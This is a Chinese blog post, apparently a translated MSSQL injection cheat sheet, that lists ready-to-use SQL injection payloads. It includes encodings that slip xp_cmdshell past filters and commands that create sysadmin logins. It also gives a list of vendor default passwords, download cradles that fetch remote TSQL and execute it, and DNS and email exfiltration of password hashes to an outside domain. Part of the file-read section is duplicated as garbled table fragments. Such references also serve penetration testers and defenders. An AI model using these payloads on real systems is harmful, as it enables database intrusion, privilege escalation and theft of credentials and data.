Mssql注入备忘录 | m0sway's Blog

DBMS识别

描述	语句
WAITFOR 函数	page.asp?id=’;WAITFOR DELAY ‘00:00:10’; –
默认变量	page.asp?id=sql’; SELECT @@SERVERNAME –
错误消息注意：通过无效语法触发数据库错误有时会返回包含DBMS名称的详细错误消息。	page.asp?id=’
错误消息注意：如果id参数是整数，则@@ SERVERNAME变量的字符串值可能导致转换错误。	page.asp?id=@@SERVERNAME
错误消息注意：如果id参数是整数，则@@ SERVERNAME变量的字符串值可能导致转换错误。	page.asp?id=0/@@SERVERNAME

一般提示

基于ASP / ASPX的应用程序一般都是MSSQL。

将查询转换为注入

描述	语句
联合查询	product.asp?id=’ UNION SELECT @@version –
联合子查询	product.asp?id=’ UNION (SELECT @@version) –
联合null 注意：如果原始查询返回多个列，则添加null以等于列数	product.asp?id=’ UNION (SELECT @@version,null) –
堆积式查询注意：堆积式查询并不总是返回结果，因此它们最适合用于更新/修改数据的注入。	product.asp?id=’; SELECT @@version –

注入类型

基于错误

当无效输入传递给数据库时，通过触发数据库中的错误来利用基于错误的注入。错误消息可用于返回完整的查询结果，或获取有关如何重构查询以供进一步利用的信息。

描述	语句
显式转换	SELECT convert(int,(SELECT @@version)) SELECT cast((SELECT @@version) as int)
隐式转换	SELECT 1/@@version

以下任何查询都可以使用该convert函数重写或作为隐式转换.

描述	语句
将CAST函数注入当前查询	SELECT CAST(@@version as int)
显示系统用户	SELECT CAST(SYSTEM_USER as int);
用xml路径在一行中显示所有数据库	SELECT CAST((SELECT name,’,’ FROM master..sysdatabases FOR XML path(‘’)) as int) SELECT CAST((SELECT name AS “data()” FROM master..sysdatabases FOR xml path(‘’)) AS int);
显示服务器名称	SELECT CAST(@@SERVERNAME as int);
显示服务名称	SELECT CAST(@@SERVICENAME as int);
显示数据库列表注意：下面的查询必须在一行中执行。	DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = ‘’;SELECT @listStr = @listStr + Name + ‘,’ FROM master..sysdatabases;SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int);
显示表列表注意：下面的查询必须在一行中执行	DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX); SET @listStr = ‘’;SELECT @listStr = @listStr + Name + ‘,’ FROM MYDATABASE..sysobjects WHERE type = ‘U’;SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);SELECT CAST(@myoutput as int);
显示列列表注意：下面的查询必须在一行中执行。	DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = ‘’;SELECT @listStr = @listStr + Name + ‘,’ FROM MYDATABASE..syscolumns WHERE id=object_id(‘MYTABLE’);SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1);select cast(@myoutput as int);
显示列数据注意：下面的查询必须在一行中执行。用*替换MYCOLUMN来选择所有列	DECLARE @listStr VARCHAR(MAX);DECLARE @myoutput VARCHAR(MAX);SET @listStr = ‘’;SELECT @listStr = @listStr + MYCOLUMN + ‘,’ FROM MYDATABASE..MYTABLE;SELECT @myoutput = SUBSTRING(@listStr , 1, LEN(@listStr)-1)SELECT CAST(@myoutput as int);
一次显示一个数据库名称注意：递增内部TOP值以获取下一条记录	SELECT TOP 1 CAST(name as int) FROM sysdatabases WHERE name in (SELECT TOP 2 name FROM sysdatabases ORDER BY name ASC) ORDER BY name DESC

联合查询注入

基于联合的SQL注入允许攻击者通过扩展原始查询返回的结果来从数据库中提取信息。仅当原始/新查询具有相同结构（列的数量和数据类型）时，才能使用联合运算符。

描述	语句
联合	SELECT user UNION SELECT @@version
联合子查询	SELECT user UNION (SELECT @@version)
联合null 注意：如果原始查询返回多个列，则添加null以等于列数	SELECT user,system_user UNION (SELECT @@version,null)
联合null二进制减半注意：此查询用于检测列数。[numberOfColumns]大于列数则返回错误，从而找到表中列的数目。	SELECT * FROM yourtable ORDER BY [numberOfColumns]
堆积式查询注意：堆积式查询并不总是返回结果，因此它们最适合用于更新/修改数据的注入。	SELECT @@version; SELECT @@version –

盲注

盲注是更高级的注入方法之一。部分盲和全盲方法详述如下。执行这些查询时要小心，因为如果通过大量自动化执行，它们可能会使服务器过载。

部分盲

部分盲注是指返回HTTP状态代码或HTML响应中的其他标记的查询，他们指示真或假陈述。下面的查询将试图通过在猜测的信息上声明真实或错误的响应来利用注入。真或假查询也可以通过返回1（真）或0（假）行来识别。一个错误也可以用来标识0（False）。

描述	语句
版本是12.0.2000.8	SELECT @@version WHERE @@version LIKE ‘%12.0.2000.8%’
子选择启用	SELECT (SELECT @@version)
表log_table存在	SELECT * FROM log_table
列message存在于表log_table中	SELECT message from log_table
第一条message的第一个字母是t	WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table) SELECT message FROM data WHERE row = 1 and message like ‘t%’

将部分盲查询转换为全盲查询

通过使用以下转换，可以在全盲方案中使用上述任何查询：
IF exists(PARTIAL_BLIND_QUERY) WAITFOR DELAY ‘00:00:02’

全盲

全盲查询不会在HTTP / HTML响应中指示任何查询结果。这使他们依赖于定时功能和其他out-of-band 攻击方法。一个真的SQL语句需要X秒的回应，一个假的SQL语句应该立即返回。

描述	语句
Version is 12.0.2000.8	IF exists(SELECT @@version where @@version like ‘%12.0.2000.8%’) WAITFOR DELAY ‘00:00:02’

注入手法

条件语句

描述	语句
Case	SELECT CASE WHEN 1=1 THEN 1 ELSE 0 END
If/Else	IF 1=2 SELECT ‘true’ ELSE SELECT ‘false’;

注入定位

注入位置	语句	注入字符串
SELECT -> WHERE	SELECT * FROM USERS WHERE “USER”=’$injection’;	‘ or 1=1 –
UPDATE -> SET	UPDATE USERS SET “email”=’$injection’ WHERE “USER”=’NetSPI’;	‘+’harold@netspi.com
‘+’
UPDATE -> WHERE 注意：尝试将注入字符串设置为有效的WHERE值。如果对象已更新，则注入成功。	UPDATE USERS SET “email”=’harold@netspi.com

注入混淆

描述	语句
ASCII>字符	SELECT char（65）
字符> ASCII	SELECT ascii（’A’）
Hex> Int	SELECT 0x20 + 0x40
按位AND	SELECT 6 & 2
按位或	SELECT 6
按位否定	SELECT ~6
按位XOR	SELECT 6 ^ 2
字符串截取	SELECT substring(‘abcd’, 3, 2) substring(string, index, length)
Casting	SELECT cast(‘1’ AS unsigned integer) SELECT cast(‘123’ AS char)
字符串连接	SELECT concat(‘net’,’spi’)
注释	SELECT 1 –comment SELECT/comment/1
避免引号	SELECT char(65)+char(66) – returns AB
使用％0d避免使用分号	%0dwaitfor+delay+’0:0:10’–
Bypass Filtering	EXEC xP_cMdsheLL ‘dir’;
用注释避免空格	EXEC//xp_cmdshell//‘dir’;– ‘;ex//ec xp_cmds//hell ‘dir’;
用连接避免查询检测	DECLARE @cmd as varchar(3000); SET @cmd = ‘x’+’p’+’_’+’c’+’m’+’d’+’s’+’h’+’e’+’l’+’l’+’/**/‘+””+’d’+’i’+’r’+””; exec(@cmd);
用字符编码避免查询检测	DECLARE @cmd as varchar(3000); SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+ CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116) +CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+ CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+ CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+ CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59)); EXEC(@cmd);
用base64编码避免查询检测	DECLARE @data varchar(max), @XmlData xml;SET @data = ‘ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn’; SET @XmlData = CAST(‘’ + @data + ‘’ as xml);SET @data = CONVERT(varchar(max), @XmlData.value(‘(data)[1]’, ‘varbinary(max)’)); exec (@data);
用Nchar编码避免查询检测	DECLARE @cmd as nvarchar(3000); SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+ nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+ nchar(101)+nchar(114)+nchar(46)+nchar(46)+ nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109) +nchar(100)+nchar(115)+nchar(104)+ nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100) +nchar(105)+nchar(114)+nchar(39)+nchar(59)); EXEC(@cmd);
用ASCII + CAST 编码避免查询检测	DECLARE @cmd as varchar(MAX); SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX)); exec(@cmd);
用ASCII + CONVERT 编码避免查询检测	DECLARE @cmd as varchar(MAX); SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227); exec(@cmd);
用varbinary(MAX) 避免查询检测	DECLARE @cmd as varchar(MAX); SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227); exec(@cmd);
用 sp_sqlexec 避免 EXEC()	DECLARE @cmd as varchar(3000); SET @cmd = convert(varchar(0),0×78705F636D647368656C6C202764697227); exec sp_sqlexec @cmd;
执行 xp_cmdshell ‘dir’	DECLARE @tmp as varchar(MAX); SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+ char(68)+char(83)+char(72)+char(69)+char(76)+char(76); exec @tmp ‘dir’;

利用方式

信息收集

收集有关任何测试环境的信息通常很有价值; 版本号，用户帐户和数据库都有助于升级漏洞。以下是常见的方法。
*需要特权用户

描述	语句
版本	SELECT @@version;
单个用户	SELECT user; SELECT system_user; SELECT user_name(); SELECT loginame from master..sysprocesses where spid = @@SPID
所有用户	SELECT name from master..syslogins
表	SELECT table_catalog, table_name FROM information_schema.columns
列	SELECT table_catalog, column_name FROM information_schema.columns
所有数据库	SELECT name from master..sysdatabases;
当前数据库	SELECT db_name();
服务器名称	SELECT @@SERVERNAME
查找存储过程	SELECT * from master..sysobjects where name like ‘sp%’ order by name desc
通过用户名获取SUID	SELECT SUSER_ID(‘sa’)
通过SUID获取用户名	SELECT SUSER_NAME(1)
检查账户是不是管理员	IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E)) SELECT is_srvrolemember(‘sysadmin’);
Policies	SELECT p.policy_id, p.name as [PolicyName], p.condition_id, c.name as [ConditionName], c.facet, c.expression as [ConditionExpression], p.root_condition_id, p.is_enabled, p.date_created, p.date_modified, p.description, p.created_by, p.is_system, t.target_set_id, t.TYPE, t.type_skeleton FROM msdb.dbo.syspolicy_policies p INNER JOIN syspolicy_conditions c ON p.condition_id = c.condition_id INNER JOIN msdb.dbo.syspolicy_target_sets t ON t.object_set_id = p.object_set_id
域用户	https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/templates/tsql/Get-SQLDomainUser-Example.sql
DB 审计	SELECT a.audit_id, a.name as audit_name, s.name as database_specification_name, d.audit_action_name, d.major_id, OBJECT_NAME(d.major_id) as object, s.is_state_enabled, d.is_group, s.create_date, s.modify_date, d.audited_result FROM sys.server_audits AS a JOIN sys.database_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.database_audit_specification_details AS d ON s.database_specification_id = d.database_specification_id
Server 审计	SELECT audit_id, a.name as audit_name, s.name as server_specification_name, d.audit_action_name, s.is_state_enabled, d.is_group, d.audit_action_id, s.create_date, s.modify_date FROM sys.server_audits AS a JOIN sys.server_audit_specifications AS s ON a.audit_guid = s.audit_guid JOIN sys.server_audit_specification_details AS d ON s.server_specification_id = d.server_specification_id
查询历史记录	SELECT * FROM (SELECT COALESCE(OBJECT_NAME(qt.objectid),’Ad-Hoc’) AS objectname, qt.objectid as objectid, last_execution_time, execution_count, encrypted,(SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement FROM sys.dm_exec_query_stats AS qs CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x ORDER BY execution_count DESC

数据定位

能够正确地识别和定位敏感信息可以以指数的方式减少在数据库中花费的时间，这意味着可以花费更多的时间在其他方向上。

描述	语句
列出非默认数据库	SELECT NAME FROM sysdatabases WHERE (NAME NOT LIKE ‘distribution’) AND (NAME NOT LIKE ‘master’) AND (NAME NOT LIKE ‘model’) AND (NAME NOT LIKE ‘msdb’) AND (NAME NOT LIKE ‘publication’) AND (NAME NOT LIKE ‘reportserver’) AND (NAME NOT LIKE ‘reportservertempdb’) AND (NAME NOT LIKE ‘resource’) AND (NAME NOT LIKE ‘tempdb’) ORDER BY NAME;
列出非默认表	SELECT ‘[‘ + SCHEMA_NAME(t.schema_id) + ‘].[‘ + t.name + ‘]’ AS fulltable_name, SCHEMA_NAME(t.schema_id) AS schema_name, t.name AS table_name, i.rows FROM sys.tables AS t INNER JOIN sys.sysindexes AS i ON t.object_id = i.id AND i.indid < 2 WHERE (ROWS> 0) AND (t.name NOT LIKE ‘syscolumns’) AND (t.name NOT LIKE ‘syscomments’) AND (t.name NOT LIKE ‘sysconstraints’) AND (t.name NOT LIKE ‘sysdepends’) AND (t.name NOT LIKE ‘sysfilegroups’) AND (t.name NOT LIKE ‘sysfiles’) AND (t.name NOT LIKE ‘sysforeignkeys’) AND (t.name NOT LIKE ‘sysfulltextcatalogs’) AND (t.name NOT LIKE ‘sysindexes’) AND (t.name NOT LIKE ‘sysindexkeys’) AND (t.name NOT LIKE ‘sysmembers’) AND (t.name NOT LIKE ‘sysobjects’) AND (t.name NOT LIKE ‘syspermissions’) AND (t.name NOT LIKE ‘sysprotects’) AND (t.name NOT LIKE ‘sysreferences’) AND (t.name NOT LIKE ‘systypes’) AND (t.name NOT LIKE ‘sysusers’) ORDER BY TABLE_NAME;
列名搜索	SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME like ‘%password%’
列出非默认列	SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE CHARACTER_MAXIMUM_LENGTH > 14 AND DATA_TYPE NOT IN (‘bigint’,’binary’,’bit’,’cursor’,’date’,’datetime’,’datetime2’, ‘datetimeoffset’,’float’,’geography’,’hierarchyid’,’image’,’int’,’money’,’real’, ‘smalldatetime’,’smallint’,’smallmoney’,’sql_variant’,’table’,’time’,’timestamp’, ‘tinyint’,’uniqueidentifier’,’varbinary’,’xml’) AND TABLE_NAME=’CreditCard’ OR CHARACTER_MAXIMUM_LENGTH < 1 AND DATA_TYPE NOT IN ( ‘bigint’, ‘binary’, ‘bit’, ‘cursor’, ‘date’, ‘datetime’, ‘datetime2’, ‘datetimeoffset’, ‘float’, ‘geography’, ‘hierarchyid’, ‘image’, ‘int’, ‘money’, ‘real’, ‘smalldatetime’, ‘smallint’, ‘smallmoney’, ‘sql_variant’, ‘table’, ‘time’, ‘timestamp’, ‘tinyint’, ‘uniqueidentifier’, ‘varbinary’, ‘xml’) AND TABLE_NAME=’CreditCard’ ORDER BY COLUMN_NAME;
搜索透明加密	SELECT a.database_id as [dbid], a.name, HAS_DBACCESS(a.name) as [has_dbaccess], SUSER_SNAME(a.owner_sid) as [db_owner], a.is_trustworthy_on, a.is_db_chaining_on, a.is_broker_enabled, a.is_encrypted, a.is_read_only, a.create_date, a.recovery_model_desc, b.filename FROM [sys].[databases] a INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid ORDER BY a.database_id WHERE is_encrypted=1
按数据库大小搜索	SELECT a.database_id as [dbid], a.name, HAS_DBACCESS(a.name) as [has_dbaccess], SUSER_SNAME(a.owner_sid) as [db_owner], a.is_trustworthy_on, a.is_db_chaining_on, a.is_broker_enabled, a.is_encrypted, a.is_read_only, a.create_date, a.recovery_model_desc, b.filename, (SELECT CAST(SUM(size) * 8. / 1024 AS DECIMAL(8,2)) from sys.master_files where name like a.name) as [DbSizeMb] FROM [sys].[databases] a INNER JOIN [sys].[sysdatabases] b ON a.database_id = b.dbid ORDER BY DbSizeMb DESC

提权

*需要特权用户。以下查询需要各种权限类型。请继续关注详细的权限提升路径。

建立DBA用户	* EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin’;
授予所有自定义对象的执行权限	SELECT ‘grant exec on ‘ + QUOTENAME(ROUTINE_SCHEMA) + ‘.’ + QUOTENAME(ROUTINE_NAME) + ‘ TO test’ FROM INFORMATION_SCHEMA.ROUTINES WHERE OBJECTPROPERTY(OBJECT_ID(ROUTINE_NAME),’IsMSShipped’) = 0 ;
授予执行所有存储过程	CREATE ROLE db_executor GRANT EXECUTE TO db_executor exec sp_addrolemember ‘db_executor’, ‘YourSecurityAccount’
UNC路径注入	https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e
https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/
检测非模拟登录	SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_ principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = ‘IMPERSONATE’
模拟登录注意：REVERT会将您带回原始登录名。	EXECUTE AS LOGIN = ‘sa’; SELECT @@VERSION;
创建sysadmin用户	* USE [master] GO CREATE LOGIN [test] WITH PASSSWORD=N ‘test’, DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF GO EXEC master..sp_addsrvrolemember @loginame=N’test’, @rolename=N’sysadmin’ GO
创建sysadmin用户	* EXEC sp_addlogin ‘user’, ‘pass’; *EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin’;
删除用户	* EXEC sp_droplogin ‘user’;
检索SQL代理连接密码	exec msdb.dbo.sp_get_sqlagent_properties
检索DTS连接密码	select msdb.dbo.rtbldmbprops
获取sysadmin作为本地管理员	https://blog.netspi.com/get-sql-server-sysadmin-privileges-local-admin-powerupsql/
启动存储过程	https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
触发器创建	https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/
Windows自动登录密码	https://blog.netspi.com/get-windows-auto-login-passwords-via-sql-server-powerupsql/
xp_regwrite非sysadmin执行	https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e
具有可信赖数据库的存储过程	https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases
存储过程用户模拟	https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
默认密码	sa:sa sa:[empty] [username]:[username]
实例的默认密码（实例名称，用户，密码）	“ACS”,”ej”,”ej” “ACT7”,”sa”,”sage” “AOM2”,”admin”,”ca_admin” “ARIS”,”ARIS9”,”*ARIS!1dm9n#” “AutodeskVault”,”sa”,”AutodeskVault@26200” “BOSCHSQL”,”sa”,”RPSsql12345” “BPASERVER9”,”sa”,”AutoMateBPA9” “CDRDICOM”,”sa”,”CDRDicom50!” “CODEPAL”,”sa”,”Cod3p@l” “CODEPAL08”,”sa”,”Cod3p@l” “CounterPoint”,”sa”,”CounterPoint8” “CSSQL05”,”ELNAdmin”,”ELNAdmin” “CSSQL05”,”sa”,”CambridgeSoft_SA” “CADSQL”,”CADSQLAdminUser”,”Cr41g1sth3M4n!” “DHLEASYSHIP”,”sa”,”DHLadmin@1” “DPM”,”admin”,”ca_admin” “DVTEL”,”sa”,”” “EASYSHIP”,”sa”,”DHLadmin@1” “ECC”,”sa”,”Webgility2011” “ECOPYDB”,”e+C0py2007_@x”,”e+C0py2007_@x” “ECOPYDB”,”sa”,”ecopy” “Emerson2012”,”sa”,”42Emerson42Eme” “HDPS”,”sa”,”sa” “HPDSS”,”sa”,”Hpdsdb000001” “HPDSS”,”sa”,”hpdss” “INSERTGT”,”msi”,”keyboa5” “INSERTGT”,”sa”,”” “INTRAVET”,”sa”,”Webster#1” “MYMOVIES”,”sa”,”t9AranuHA7” “PCAMERICA”,”sa”,”pcAmer1ca” “PCAMERICA”,”sa”,”PCAmerica” “PRISM”,”sa”,”SecurityMaster08” “RMSQLDATA”,”Super”,”Orange” “RTCLOCAL”,”sa”,”mypassword” “SALESLOGIX”,”sa”,”SLXMaster” “SIDEXIS_SQL”,”sa”,”2BeChanged” “SQL2K5”,”ovsd”,”ovsd” “SQLEXPRESS”,”admin”,”ca_admin” “STANDARDDEV2014”,”test”,”test” “TEW_SQLEXPRESS”,”tew”,”tew” “vocollect”,”vocollect”,”vocollect” “VSDOTNET”,”sa”,”” “VSQL”,”sa”,”111”

命令执行

名称	语句
xp_cmdshell	– Enable show advanced options sp_configure ‘show advanced options’, 1 RECONFIGURE GO – Enable xp_cmdshell sp_configure ‘xp_cmdshell’, 1 RECONFIGURE GO EXEC xp_cmdshell ‘net user’
写入注册表自动运行	https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/
https://gist.github.com/nullbind/03af8d671621a6e1cef770bace19a49e
写入文件自动运行	https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
Agent Job	https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution
存储过程中的SQL注入	https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
CLR组件	https://blog.netspi.com/attacking-sql-server-clr-assemblies/
自定义扩展存储过程	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/cmd_exec.cpp

TSQL

名称	语句
ActiveX Javascript Agent Job	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_jscript.sql
ActiveX VBScript Agent Job	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_activex_vbscript.sql
cmdexec Agent Job	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_cmdexec.sql
Powershell Agent Job	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_agentjob_powershell.sql
自定义命令行shell	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_customxp.cpp
OLE自动化对象	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_oleautomationobject.sql
OPENROWSET	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_openrowset.sql
Python	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_pythonscript.tsql
R	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_rscript.sql
xp_cmdshell proxy	https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/oscmdexec_xpcmdshell_proxy.sql

文件读写

*需要特权用户

描述	语句
在服务器中下载Cradle bulk - TSQL	– Bulk Insert - Download Cradle Example – Setup variables Declare @cmd varchar(8000) – Create temp table CREATE TABLE #file (content nvarchar(4000)); – Read file into temp table - web server must support propfind BULK INSERT #file FROM ‘\sharepoint.acme.com@SSL\Path\to\file.txt’; – Select contents of file SELECT @cmd = content FROM #file – Display command SELECT @cmd – Run command EXECUTE(@cmd) – Drop the temp table DROP TABLE #file
下载Cradle OAP 1 - SQL	– OLE Automation Procedure - Download Cradle Example – Does not require a table, but can’t handle larger payloads – Note: This also works with unc paths \ip\file.txt – Note: This also works with webdav paths \ip@80\file.txt However, the target web server needs to support propfind. – Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @handle int DECLARE @Command varchar(8000 – Set target url containting TSQL SET @url = ‘http://127.0.0.1/mycmd.txt

描述

语句

在服务器中下载Cradle bulk - TSQL

– Bulk Insert - Download Cradle Example – Setup variables Declare @cmd varchar(8000) – Create temp table CREATE TABLE #file (content nvarchar(4000)); – Read file into temp table - web server must support propfind BULK INSERT #file FROM ‘\sharepoint.acme.com@SSL\Path\to\file.txt’; – Select contents of file SELECT @cmd = content FROM #file – Display command SELECT @cmd – Run command EXECUTE(@cmd) – Drop the temp table DROP TABLE #file

下载Cradle OAP 1 - SQL

– OLE Automation Procedure - Download Cradle Example – Does not require a table, but can’t handle larger payloads – Note: This also works with unc paths \ip\file.txt – Note: This also works with webdav paths \ip@80\file.txt However, the target web server needs to support propfind. – Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @handle int DECLARE @Command varchar(8000 – Set target url containting TSQL SET @url = ‘http://127.0.0.1/mycmd.txt

‘ – Setup namespace EXEC @handle=sp_OACreate ‘WinHttp.WinHttpRequest.5.1’,@WinHTTP OUT – Call the Open method to setup the HTTP request EXEC @handle=sp_OAMethod @WinHTTP, ‘Open’,NULL,’GET’,@url,’false’ – Call the Send method to send the HTTP GET request EXEC @handle=sp_OAMethod @WinHTTP,’Send’ – Capture the HTTP response content EXEC @handle=sp_OAGetProperty @WinHTTP,’ResponseText’, @Command out – Destroy the object EXEC @handle=sp_OADestroy @WinHTTP – Display command SELECT @Command – Run command EXECUTE (@Command) |
| 下载Cradle OAP 2 - TSQL | – OLE Automation Procedure - Download Cradle Example - Option 2 – Can handle larger payloads, but requires a table – Note: This also works with unc paths \ip\file.txt – Note: This also works with webdav paths \ip@80\file.txt However, the target web server needs to support propfind. – Setup Variables DECLARE @url varchar(300) DECLARE @WinHTTP int DECLARE @Handle int DECLARE @Command varchar(8000) – Set target url containting TSQL SET @url = ‘http://127.0.0.1/mycmd.txt
‘ – Create temp table to store downloaded string CREATE TABLE #text(html text NULL) – Setup namespace EXEC @Handle=sp_OACreate ‘WinHttp.WinHttpRequest.5.1’,@WinHTTP OUT – Call open method to configure HTTP request EXEC @Handle=sp_OAMethod @WinHTTP, ‘Open’,NULL,’GET’,@url,’false’ – Call Send method to send the HTTP request EXEC @Handle=sp_OAMethod @WinHTTP,’Send’ – Capture the HTTP response content INSERT #text(html) EXEC @Handle=sp_OAGetProperty @WinHTTP,’ResponseText’ – Destroy the object EXEC @Handle=sp_OADestroy @WinHTTP – Display the commad SELECT @Command = html from #text SELECT @Command – Run the command EXECUTE (@Command) – Remove temp table DROP TABLE #text |
| 读取文件 - TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceTxt.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_BulkInsert.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenDataSourceXlsx
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetBulk.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetTxt.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/readfile_OpenRowSetXlsx.sql |
| 写文件 - TSQL | https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_bulkinsert.sql
https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/writefile_OpenRowSetTxt.sql |

横向移动

*需要特权用户

描述	语句
创建用户	EXEC sp_addlogin ‘user’, ‘pass’;
删除用户	EXEC sp_droplogin ‘user’;
链接抓取	https://blog.netspi.com/sql-server-link-crawling-powerupsql/
作为当前服务连接到远程数据库	–Requires sysadmin SELECT * FROM OPENDATASOURCE(‘SQLNCLI’, ‘Server=MSSQLSRV04\SQLSERVER2016;Trusted_Connection=yes;’).master.dbo.sysdatabases

数据泄露

注意：可以从MSSQL发出DNS请求。但是，此请求需要管理员权限和SQL Server 2005。

描述	语句
制造DNS请求	DECLARE @host varchar(800); select @host = name + ‘-‘ + master.sys.fn_varbintohexstr(password_hash) + ‘netspi.com’ from sys.sql_logins;exec(‘xp_fileexist “\‘ + @host + ‘c$boot.ini”‘);
UNC路径（DNS请求）	xp_dirtree ‘\\data.domain.com\file’
启用sp_send_dbmail并发送查询	sp_configure ‘show advanced options’, 1;RECONFIGURE;sp_configure ‘Database Mail XPs’, 1;RECONFIGURE;exec msdb..sp_send_dbmail @recipients=‘harold@netspi.com‘,@query=’select @@version’;
基本的xp_sendmail查询	EXEC master..xp_sendmail ‘harold@netspi.com‘, ‘This is a test.’
使用xp_sendmail发送完整的电子邮件	EXEC xp_sendmail @recipients=‘harold@netspi.com‘, @message=’This is a test.’, @copy_recipients=‘test@netspi.com‘, @subject=’TEST’
通过xp_sendmail发送查询结果	EXEC xp_sendmail ‘harold@netspi.com‘, @query=’SELECT @@version’;
通过xp_sendmail发送查询结果作为附件	CREATE TABLE ##texttab (c1 text) INSERT ##texttab values (‘Put messge here.’) DECLARE @cmd varchar(56)SET @cmd = ‘SELECT c1 from ##texttab’EXEC master.dbo.xp_sendmail ‘robertk’,@query = @cmd, @no_header=’TRUE’DROP TABLE ##texttab

权限维持

描述	语句
启动存储过程	https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
触发器	https://blog.netspi.com/maintaining-persistence-via-sql-server-part-2-triggers/
Regwrite	https://blog.netspi.com/establishing-registry-persistence-via-sql-server-powerupsql/